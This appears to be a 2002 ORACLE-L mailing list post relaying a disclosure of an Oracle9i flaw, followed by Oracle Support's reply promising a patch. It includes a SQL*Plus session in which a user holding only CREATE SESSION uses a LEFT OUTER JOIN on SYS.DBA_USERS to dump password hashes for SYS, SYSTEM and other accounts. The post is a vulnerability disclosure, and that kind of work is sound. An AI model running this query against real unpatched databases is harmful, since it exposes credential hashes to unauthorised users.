This was posted on Quest/Revealnets DBA Pipeline (by Andrew Simkovsky)... Sounds like a major security issue. I have tested this on 9.0.1.2 and it is a real issue:
Someone recently sent me some information regarding a possible security flaw with Oracle's ANSI-compliant outer join syntax in Oracle9i. Apparently, an unprivileged user can view any data they want if they use either LEFT OUTER JOIN or RIGHT OUTER JOIN. Here is an example: SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2 (c) Copyright 2001 Oracle Corporation. All rights reserved. Connected to: Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production With the Partitioning option JServer Release 9.0.1.1.1 - Production SQL> connect / as sysdba Connected. SQL> CREATE USER us1 IDENTIFIED BY us11; User created. SQL> Grant Create Session to us1; Grant succeeded. SQL> connect us1/us11; Connected. SQL> select a.username, a.password 2 from sys.dba_users a left outer join sys.dba_users b on 3 b.username = a.username 4 ; USERNAME PASSWORD ------------------------------ ------------------------------ SYS D4C5016086B2DC6A SYSTEM D4DF7931AB130E37 DBSNMP E066D214D5421CCC AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD SCOTT F894844C34402B67 US1 491AB9AB94D8A9EF OUTLN 4A3BA55E08595C81 ORDSYS 7EFA02EC7EA6B86F OLAPSVR AF52CFD036E8F425 OLAPSYS 3FB8EF9DB538647C ORDPLUGINS 88A2B2C183431F00 MDSYS 72979A94BAD2AF80 CTXSYS 71E687F036AD56E5 WKSYS 69ED49EE1851900D OLAPDBA 1AF71599EDACFB00 QS_CBADM 7C632AFB71F8D305 QS_ADM 991CDDAD5C5C32CA QS 8B09C6075BDF2DC4 QS_WS 24ACF617DD7D8F2F HR 6399F3B38EDF3288 OE 9C30855E7E0CB02D PM 72E382A52E89575A SH 9793B3777CD3BD1A QS_ES E6A6FA4BB042E3C2 QS_OS FF09F3EB14AE5C26 RMAN E7B5D92911C831E1 QS_CB CF9CFACF5AE24964 QS_CS 91A00922D8C0F146 30 rows selected. SQL> =========================================================== I have tested this on my 9i database and found it to be true only for LEFT OUTER JOIN and RIGHT OUTER JOIN. There is no issue with FULL OUTER JOIN, or any of the other ANSI-compliant SQL. Here is Oracle's response: ======================================================== Thank you for your concern on this issue. The issue is being activly worked by Oracle at this time. This issue is fixed in 9.0.2 release projected for this summer. Oracle is diligently working on patchs for each version and platform. There will be alerts posted on metalink which will tell you when the patch is available for your specific system. Please update the tar if you have any additional questions related to this issue. Otherwise let me know that I can close the tar. Please monitor metalink for new alert postings specific to this bug or issue. Thanks, Oracle Support ================================================== -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Freeman, Robert INET: [EMAIL PROTECTED] Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).